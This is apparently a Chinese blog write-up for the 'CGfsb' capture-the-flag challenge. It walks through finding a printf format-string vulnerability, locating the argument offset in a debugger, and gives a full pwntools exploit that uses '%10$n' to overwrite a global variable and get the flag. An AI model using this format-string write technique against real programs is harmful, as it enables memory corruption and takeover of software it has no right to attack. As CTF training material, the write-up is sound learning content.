CGfsb

image.png

0x00 先file和checksec(打码打码,看不到看不到)

image.png

0x01 拖进ida32查看

image.png
  • 明显的printf格式化字符串漏洞
  • 分析程序,pwnme=8即可拿到flag
  • 这时候思路就有了,查看pwnme的地址为0x0804A068,利用printf格式化字符串漏洞addr+%N$n修改任意地址的值,其中%N$n是以printf第N+1个参数位置的值为地址(printf中格式化字符串是第0个参数),将输出过的字符数量的值写入这个地址中

0x02 下断点在第二个printf处,输入AAAA

image.png

0x03 调试程序到第二个printf处,查看此时stack情况

image.png
  • 0xffffd0d8为格式化字符串的地址
  • 0x41414141是printf的第11个参数位置,相对格式化字符串为第10个位置
  • 所以上述的N为10

0x04 给出完整exp

主体在if __name__ == '__main__':中,其它都是模板,个人喜好而已,直接套用就行

from pwn import *

local=0
pc='./cgfsb'
aslr=True
context.log_level=True
context.terminal = ["deepin-terminal","-x","sh","-c"]

libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

if local==1:
    #p = process(pc,aslr=aslr,env={'LD_PRELOAD': './libc.so.6'})
    p = process(pc,aslr=aslr)
    #gdb.attach(p,'c')
else:
    remote_addr=['111.198.29.45', 39802]
    p=remote(remote_addr[0],remote_addr[1])

ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda   : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)

def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

def raddr(a=6):
    if(a==6):
        return u64(rv(a).ljust(8,'\x00'))
    else:
        return u64(rl().strip('\n').ljust(8,'\x00'))

if __name__ == '__main__':
    payload1 = 'cxy'
    pwnme = 0x0804A068
    payload2 = p32(pwnme) + 'aaaa'
    payload2 += '%10$n'
    rl()
    sl(payload1)
    rl()
    sl(payload2)
    rl()
    p.interactive()

0x05 结果

image.png
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 在C语言中,五种基本数据类型存储空间长度的排列顺序是: A)char B)char=int<=float C)ch...
    夏天再来阅读 3,433评论 0 2
  • 官网 中文版本 好的网站 Content-type: text/htmlBASH Section: User ...
    不排版阅读 4,521评论 0 5
  • 这道题题目看起来我就懵了,菜鸡不知道printf还有什么用......emmm我不就是那个菜鸡吗?然后我选择百度p...
    YeeZi_阅读 609评论 0 0
  • 版权声明:本文为 gfson 原创文章,转载请注明出处。注:作者水平有限,文中如有不恰当之处,请予以指正,万分感谢...
    gfson阅读 3,284评论 0 6
  • 指针是C语言中广泛使用的一种数据类型。 运用指针编程是C语言最主要的风格之一。利用指针变量可以表示各种数据结构; ...
    朱森阅读 3,514评论 3 44